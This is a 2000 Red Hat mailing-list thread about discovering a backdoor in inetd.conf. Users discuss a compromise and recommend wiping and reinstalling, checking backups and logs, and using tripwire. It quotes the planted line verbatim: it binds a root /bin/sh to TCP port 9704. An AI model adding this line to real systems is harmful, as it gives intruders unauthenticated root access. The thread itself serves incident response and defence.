Rat B*STARD!
I thought I'd check out my inetd.conf too. I'd been looking
at the log files daily, and I was usnig "snort" to
watch for suspicious activity (mind you, I'm little
more than a mere novice)
Same damn line. Looks like I know what I'm doing this
weekend.... and learning IPCHAINS.
Thanks, all. I would probably have never thought to look
there.
Mark
>
> Message: 2> Message: 3
> Date: Mon, 11 Sep 2000 16:22:58 -0500
> From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: highly suspicious line in inetd.conf
> Reply-To: [EMAIL PROTECTED]
>
> On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
> >
> > Looking over a clients system I found the following
> > line in inetd.con:
> > 9704 stream tcp nowait root /bin/sh sh -i
>
> EEK!
>
> > telnet to the port and instant root access.
>
> Yup.
>
> > A quick look around didn't reveal any obvious
> > problems. I'm worred about the non-obvious
> > now.
>
> Good man.
>
> > any suggestions for things to do and places
> > to poke into would be appreciated.
>
> Well...
>
> > (is it likely the system was compromsied for
> > future use?)
>
> I'd say so, yes. And in that case all bets are off; they
> could have left
> behind just about anything as a back door or other malicious
> stuff, the only
> way you can really be sure they're gone (whoever "they" are)
> is to reinstall
> from bare metal. :(
>
> Don't really know what your setup is like or how long they've
> owned your box,
> but hopefully you've kept good logs and backups of your
> system so that you can
> have some idea of when the inetd.conf file was compromised
> (do old backup
> versions of the file have that line as well? how far back?)
> and can then
> cross-reference to that date in your old log files. But even
> then all you'd
> get would be some indication of when and how they got in, and
> maybe some clues
> about what they did once they got there. It's almost
> impossible to guarantee
> that you've undone the damage unless you were running
> tripwire or some other
> equivalent.
>
> This is a pretty klutzy way of owning a system, whoever did
> this was either
> (a) not real slick or (b) not at all concerned about being
> the only person
> who could own your box. But that doesn't mean that they
> didn't hide their
> tracks well elsewhere. Best bet is to take the machine down
> (at least off
> the network), secure any vital data, wipe it, and start over. Sorry.
>
> Cheers,
> -m
> --
> Michael Jinks, IB
> Systems Administrator, CCCP
> finger [EMAIL PROTECTED] for public key
> Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
>
> >
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
